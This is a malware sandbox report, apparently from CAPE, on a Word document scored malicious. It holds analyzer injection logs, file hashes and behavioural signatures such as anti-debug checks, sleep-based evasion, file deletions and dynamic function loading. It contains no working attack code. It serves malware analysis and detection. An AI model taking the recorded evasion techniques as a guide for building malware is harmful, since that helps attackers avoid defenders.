2019-10-10 01:12:22,532 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-10-10 01:12:23,936 [modules.auxiliary.human] INFO: Closing Office window.
2019-10-10 01:12:24,061 [root] DEBUG: DLL unloaded from 0x6AEA0000.
2019-10-10 01:12:24,092 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 01:12:24,122 [root] DEBUG: DLL unloaded from 0x6AEA0000.
2019-10-10 01:12:29,006 [root] DEBUG: DLL unloaded from 0x6FFD0000.
2019-10-10 01:12:29,568 [root] DEBUG: DLL unloaded from 0x76C00000.
2019-10-10 01:12:29,630 [root] DEBUG: DLL unloaded from 0x6AE20000.
2019-10-10 01:12:29,707 [root] DEBUG: DLL unloaded from 0x75980000.
2019-10-10 01:12:29,786 [root] DEBUG: DLL unloaded from 0x6AEA0000.
2019-10-10 01:12:30,003 [root] DEBUG: DLL unloaded from 0x65300000.
2019-10-10 01:12:31,345 [root] DEBUG: DLL loaded at 0x6B100000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-10-10 01:12:31,454 [root] DEBUG: DLL unloaded from 0x6B100000.
2019-10-10 01:12:32,000 [root] DEBUG: DLL unloaded from 0x75980000.
2019-10-10 01:12:32,078 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 01:12:32,203 [root] DEBUG: DLL unloaded from 0x6A620000.
2019-10-10 01:12:32,250 [root] DEBUG: DLL unloaded from 0x6B7E0000.
2019-10-10 01:12:32,344 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:12:32,421 [root] DEBUG: DLL unloaded from 0x6B760000.
2019-10-10 01:12:32,532 [root] DEBUG: DLL unloaded from 0x73BA0000.
2019-10-10 01:12:32,703 [root] DEBUG: DLL unloaded from 0x2F9A0000.
2019-10-10 01:12:32,890 [root] DEBUG: DLL unloaded from 0x6B720000.
2019-10-10 01:12:33,030 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:12:33,312 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x747D0000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x6FFD0000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x6B6C0000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x74930000.
2019-10-10 01:12:33,374 [root] DEBUG: DLL unloaded from 0x75700000.
2019-10-10 01:12:33,374 [root] DEBUG: DLL unloaded from 0x6B720000.
2019-10-10 01:12:33,390 [root] DEBUG: DLL unloaded from 0x000007FEF4FC0000.
2019-10-10 01:12:33,421 [root] WARNING: File at path "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7C581AA1-5DA9-47A8-BE56-AED5669B1F15}.tmp" does not exist, skip.
2019-10-10 01:12:33,421 [root] DEBUG: DLL unloaded from 0x758B0000.
2019-10-10 01:12:33,421 [root] DEBUG: DLL unloaded from 0x6FFD0000.
2019-10-10 01:12:33,436 [root] DEBUG: DLL unloaded from 0x754F0000.
2019-10-10 01:12:33,436 [root] DEBUG: DLL unloaded from 0x6AE60000.
2019-10-10 01:12:33,436 [root] DEBUG: DLL unloaded from 0x6B5C0000.
2019-10-10 01:12:33,499 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:12:33,499 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 01:12:33,499 [root] DEBUG: DLL unloaded from 0x000007FEF2E10000.
2019-10-10 01:12:33,499 [root] DEBUG: DLL unloaded from 0x749D0000.
2019-10-10 01:12:33,513 [root] INFO: Notified of termination of process with pid 1224.
2019-10-10 01:12:34,184 [root] INFO: Process with pid 1224 has terminated
2019-10-10 01:12:35,214 [root] INFO: Process with pid 3012 has terminated
2019-10-10 01:12:51,720 [root] DEBUG: DLL unloaded from 0x000007FEFB0D0000.
2019-10-10 01:12:52,125 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 2932
2019-10-10 01:12:52,125 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:12:52,155 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:12:52,155 [root] DEBUG: Loader: Injecting process 2932 (thread 2380) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,155 [root] DEBUG: Process image base: 0x00000000FF6E0000
2019-10-10 01:12:52,171 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,171 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF73F000 - 0x000007FEFF430000
2019-10-10 01:12:52,171 [root] DEBUG: InjectDllViaIAT: Allocated 0x234 bytes for new import table at 0x00000000FF740000.
2019-10-10 01:12:52,187 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:12:52,187 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,187 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2932
2019-10-10 01:12:52,203 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 2932
2019-10-10 01:12:52,203 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:12:52,219 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:12:52,219 [root] DEBUG: Loader: Injecting process 2932 (thread 2380) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,233 [root] DEBUG: Process image base: 0x00000000FF6E0000
2019-10-10 01:12:52,233 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,233 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:12:52,233 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,250 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2932
2019-10-10 01:12:52,250 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:12:52,280 [root] INFO: Disabling sleep skipping.
2019-10-10 01:12:52,296 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:12:52,296 [root] WARNING: Unable to hook LockResource
2019-10-10 01:12:52,312 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:12:52,312 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2932 at 0x000000006B360000, image base 0x00000000FF6E0000, stack from 0x0000000000290000-0x00000000002A0000
2019-10-10 01:12:52,312 [root] DEBUG: Commandline: C:\Windows\sysnative\wbem\wmiprvse.exe -Embedding.
2019-10-10 01:12:52,328 [root] INFO: Added new process to list with pid: 2932
2019-10-10 01:12:52,328 [root] INFO: Monitor successfully loaded in process with pid 2932.
2019-10-10 01:12:52,344 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 01:12:52,358 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-10-10 01:12:52,358 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-10-10 01:12:52,437 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-10-10 01:12:52,453 [root] DEBUG: DLL loaded at 0x000007FEF9D50000: C:\Windows\system32\wbem\wbemprox (0xf000 bytes).
2019-10-10 01:12:52,467 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-10-10 01:12:52,483 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-10-10 01:12:52,500 [root] DEBUG: DLL loaded at 0x000007FEFD000000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-10-10 01:12:52,546 [root] DEBUG: DLL loaded at 0x000007FEFA0A0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-10-10 01:12:52,562 [root] DEBUG: DLL loaded at 0x000007FEF97C0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-10-10 01:12:52,951 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-10-10 01:12:53,513 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\system32\wbem\wmiprov (0x3c000 bytes).
2019-10-10 01:13:14,184 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2019-10-10 01:13:14,371 [root] WARNING: File at path "C:\Users\user\852.exe" does not exist, skip.
2019-10-10 01:13:24,089 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-10-10 01:13:25,430 [root] DEBUG: DLL unloaded from 0x000007FEF2A00000.
2019-10-10 01:13:25,650 [root] DEBUG: DLL unloaded from 0x000007FEF97C0000.
2019-10-10 01:13:25,664 [root] DEBUG: DLL unloaded from 0x000007FEF9A00000.
2019-10-10 01:13:25,664 [root] DEBUG: DLL unloaded from 0x000007FEFA0A0000.
2019-10-10 01:13:25,680 [root] DEBUG: DLL unloaded from 0x000007FEF9D50000.
2019-10-10 01:13:25,836 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-10-10 01:13:25,852 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-10-10 01:13:25,884 [root] INFO: Notified of termination of process with pid 2760.
2019-10-10 01:13:26,101 [root] WARNING: File at path "C:\Users\user\852.exe" does not exist, skip.
2019-10-10 01:13:26,132 [root] WARNING: File at path "C:\Users\user\852.exe" does not exist, skip.
2019-10-10 01:13:26,132 [root] WARNING: File at path "C:\Users\user\852.exe" does not exist, skip.
2019-10-10 01:13:26,148 [root] WARNING: File at path "C:\Users\user\852.exe" does not exist, skip.
2019-10-10 01:13:26,196 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-10-10 01:13:26,210 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-10-10 01:13:26,226 [root] DEBUG: DLL unloaded from 0x000007FEFC500000.
2019-10-10 01:13:26,226 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 01:13:26,243 [root] DEBUG: DLL unloaded from 0x000007FEF2060000.
2019-10-10 01:13:26,257 [root] DEBUG: DLL unloaded from 0x000007FEF2D70000.
2019-10-10 01:13:26,257 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-10-10 01:13:26,273 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-10-10 01:13:26,289 [root] INFO: Notified of termination of process with pid 2348.
2019-10-10 01:13:26,601 [root] INFO: Process with pid 2760 has terminated
2019-10-10 01:13:27,647 [root] INFO: Process with pid 2348 has terminated
2019-10-10 01:13:28,862 [root] DEBUG: DLL unloaded from 0x000007FEF9540000.
2019-10-10 01:13:36,164 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8390000 to caller regions list (ntdll::NtDuplicateObject).
2019-10-10 01:13:36,210 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF45C0000 to caller regions list (ntdll::NtDuplicateObject).
2019-10-10 01:13:36,382 [root] INFO: Announced 64-bit process name: taskhost.exe pid: 2436
2019-10-10 01:13:36,414 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:13:36,631 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:13:36,631 [root] DEBUG: Loader: Injecting process 2436 (thread 0) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:13:36,648 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2988, handle 0x84
2019-10-10 01:13:36,648 [root] DEBUG: Process image base: 0x00000000FFC30000
2019-10-10 01:13:36,663 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-10-10 01:13:36,678 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-10-10 01:13:36,694 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:13:36,740 [root] INFO: Disabling sleep skipping.
2019-10-10 01:13:36,788 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:13:36,803 [root] WARNING: Unable to hook LockResource
2019-10-10 01:13:36,851 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2436 at 0x000000006B360000, image base 0x00000000FFC30000, stack from 0x0000000002B86000-0x0000000002B90000
2019-10-10 01:13:36,865 [root] DEBUG: Commandline: C:\Windows\sysnative\"taskhost.exe".
2019-10-10 01:13:36,865 [root] INFO: Added new process to list with pid: 2436
2019-10-10 01:13:36,897 [root] INFO: Monitor successfully loaded in process with pid 2436.
2019-10-10 01:13:36,913 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:13:36,928 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:13:36,928 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:13:36,990 [modules.auxiliary.human] INFO: Found button "OK", clicking it
2019-10-10 01:13:37,786 [root] ERROR: Traceback (most recent call last):
  File "C:\awvqohb\analyzer.py", line 831, in run
    handler.start()
  File "C:\Python27\lib\threading.py", line 745, in start
    _start_new_thread(self.__bootstrap, ())
error: can't start new thread
Traceback (most recent call last):
  File "C:\awvqohb\analyzer.py", line 831, in run
    handler.start()
  File "C:\Python27\lib\threading.py", line 745, in start
    _start_new_thread(self.__bootstrap, ())
error: can't start new thread
2019-10-10 01:13:38,286 [root] DEBUG: DLL unloaded from 0x0000000076EF0000.
2019-10-10 01:13:38,286 [root] DEBUG: DLL unloaded from 0x000007FEFB060000.
2019-10-10 01:13:38,316 [root] DEBUG: DLL unloaded from 0x000007FEFBB00000.
2019-10-10 01:13:38,378 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 01:14:02,621 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 01:14:43,898 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-10-10 01:14:43,898 [root] INFO: Created shutdown mutex.
2019-10-10 01:14:44,913 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 1632
2019-10-10 01:14:44,913 [root] INFO: Terminate event set for process 1632.
2019-10-10 01:14:44,913 [root] DEBUG: Terminate Event: Skipping dump of process 1632
2019-10-10 01:14:44,913 [root] INFO: Terminating process 1632 before shutdown.
2019-10-10 01:14:44,913 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 01:14:44,913 [root] DEBUG: Terminate Event: Shutdown complete for process 1632 but failed to inform analyzer.
2019-10-10 01:14:45,927 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2932
2019-10-10 01:14:45,927 [root] INFO: Terminate event set for process 2932.
2019-10-10 01:14:45,927 [root] INFO: Terminating process 2932 before shutdown.
2019-10-10 01:14:45,927 [root] INFO: Waiting for process 2932 to exit.
2019-10-10 01:14:45,927 [root] DEBUG: Terminate Event: Skipping dump of process 2932
2019-10-10 01:14:45,927 [root] DEBUG: Terminate Event: Shutdown complete for process 2932 but failed to inform analyzer.
2019-10-10 01:14:46,940 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2436
2019-10-10 01:14:46,940 [root] INFO: Terminate event set for process 2436.
2019-10-10 01:14:46,940 [root] INFO: Terminating process 2436 before shutdown.
2019-10-10 01:14:46,940 [root] INFO: Waiting for process 2436 to exit.
2019-10-10 01:14:46,940 [root] DEBUG: Terminate Event: Skipping dump of process 2436
2019-10-10 01:14:46,940 [root] DEBUG: Terminate Event: Shutdown complete for process 2436 but failed to inform analyzer.
2019-10-10 01:14:47,954 [root] INFO: Shutting down package.
2019-10-10 01:14:47,954 [root] INFO: Stopping auxiliary modules.
2019-10-10 01:14:47,954 [root] INFO: Finishing auxiliary modules.
2019-10-10 01:14:47,954 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-10-10 01:14:47,954 [root] WARNING: File at path "C:\yfIMibnsZc\debugger" does not exist, skip.
2019-10-10 01:14:47,954 [root] WARNING: Monitor injection attempted but failed for process 80280815.
2019-10-10 01:14:47,954 [root] WARNING: Monitor injection attempted but failed for process 1.
2019-10-10 01:14:47,954 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-10-10 00:11:15 2019-10-10 00:15:02

File Details

File Name tmpjlr0l6ur
File Size 216576 bytes
File Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Re-contextualized, Subject: TCP, Author: Delmer Reichert, Keywords: Japan, Comments: Small Soft Towels, Template: Normal.dotm, Last Saved By: Arjun Flatley, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 21:38:00 2019, Last Saved Time/Date: Tue Oct 8 21:38:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5 3c97fd74bbe556ed5e5d00b0176e79f8
SHA1 ccab819281040378fe6c825d0703fc5bac79f149
SHA256 6743e819a34e26290e4b9e7692ff5a063cdc0d48cc87f6c77fb3c28097db79e4
SHA512 366541400d6dbd7eb642d39ccb79ae1cba242d22bd249264172ced9b8d45f5ee0a81347216e37ad06bf0081b74ee82da7d48cc1418622b87f0afeffbc9e21e9e
CRC32 7725EB06
Ssdeep 6144:cGdugICAs3MXPxTqfVh6qYn4JH1O5DeWje6:cGdugIE3WxTqfbNNJH0FeWj
TrID
  • 54.2% (.DOC) Microsoft Word document (32000/1/3)
  • 32.2% (.DOC) Microsoft Word document (old ver.) (19000/1/2)
  • 13.5% (.) Generic OLE2 / Multistream Compound File (8000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Scheduled file move on reboot detected
File Move on Reboot: Old: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BBT2PZNY16H6UO4BLGV1.temp -> New: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Schemas\MS Word_restart.xml
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24BB29B5-31E2-492F-A1C2-B9A7CAF0970F}.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5A32F2.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ECC0B75.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8474B044.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BF02AB8F.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E846D446.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49D91119.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36EA6778.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70128693.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3843BE5A.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7170127D.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\618D96C.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A37C1757.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\618D96C.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3843BE5A.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36EA6778.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E846D446.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8474B044.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5A32F2.wmf
DeletedFile: C:\Users\user\AppData\Local\Temp\CVR7204.tmp.cvr
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{758F78BC-E4A0-41F0-BD45-D36B0B402034}.tmp
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2348.6635733
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2348.6635733
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2348.6635733
Guard pages use detected - possible anti-debugging.
A process attempted to delay the analysis task.
Process: WINWORD.EXE tried to sleep 361 seconds, actually delayed analysis time by 0 seconds
Process: splwow64.exe tried to sleep 844 seconds, actually delayed analysis time by 0 seconds
Process: WmiPrvSE.exe tried to sleep 720 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: GKWord.dll/FValidateWordFile
DynamicLoader: GKWord.dll/HrInitHost
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/RpcMgmtIsServerListening
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: mso.dll/
DynamicLoader: Winspool.DRV/StartDocDlgW
DynamicLoader: Winspool.DRV/OpenPrinterW
DynamicLoader: Winspool.DRV/ResetPrinterW
DynamicLoader: Winspool.DRV/ClosePrinter
DynamicLoader: Winspool.DRV/GetPrinterW
DynamicLoader: Winspool.DRV/GetPrinterDriverW
DynamicLoader: Winspool.DRV/EndDocPrinter
DynamicLoader: Winspool.DRV/EndPagePrinter
DynamicLoader: Winspool.DRV/ReadPrinter
DynamicLoader: Winspool.DRV/StartDocPrinterW
DynamicLoader: Winspool.DRV/StartPagePrinter
DynamicLoader: Winspool.DRV/AbortPrinter
DynamicLoader: Winspool.DRV/DocumentEvent
DynamicLoader: Winspool.DRV/QuerySpoolMode
DynamicLoader: Winspool.DRV/QueryRemoteFonts
DynamicLoader: Winspool.DRV/SeekPrinter
DynamicLoader: Winspool.DRV/QueryColorProfile
DynamicLoader: Winspool.DRV/SplDriverUnloadComplete
DynamicLoader: Winspool.DRV/DocumentPropertiesW
DynamicLoader: Winspool.DRV/
DynamicLoader: Winspool.DRV/IsValidDevmodeW
DynamicLoader: Winspool.DRV/GetSpoolFileHandle
DynamicLoader: Winspool.DRV/CommitSpoolData
DynamicLoader: Winspool.DRV/CloseSpoolFileHandle
DynamicLoader: Winspool.DRV/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GetCharABCWidthsI
DynamicLoader: USP10.DLL/ScriptGetFontScriptTags
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags
DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: USER32.dll/NotifyWinEvent
DynamicLoader: riched20.dll/CreateTextServices
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32MapReferenceClsidToConfiguredClsid
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
